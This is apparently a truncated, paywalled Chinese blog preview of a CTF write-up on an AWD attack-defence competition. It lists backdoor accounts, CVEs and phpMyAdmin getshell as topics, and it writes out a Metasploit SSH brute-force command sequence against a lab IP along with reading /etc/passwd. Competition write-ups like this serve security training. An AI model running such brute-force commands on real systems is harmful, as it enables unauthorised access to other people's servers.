超级会员免费看
本文为2021一带一路暨金砖大赛中企业信息系统安全赛项的赛后writeup,重点讨论了AWD(攻防对抗)模式下的实战经验,涉及SSH安全、服务器运维及网络安全策略。
更多详情私聊博主
订阅专栏解锁更多~~觉得不错麻烦点个赞~~~
AWD_writeup 主要考点:后门账户、数据库操作、cve漏洞、后门漏洞、自动化攻击 1、解法一 ssh弱口令账户 用户登录后cat /etc/passwd 发现系统存在额外账户
使用msf进行ssh爆破尝试 msfconsole use auxiliary/scanner/ssh/ssh_login set rhost 192.168.2.162 set rport 22 set username administrator set pass_file /root/Desktop/top100.txt set verbose true run
2、解法二 phpmyadmin getshell 发现站点phpmyadmin 并且在 confi
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
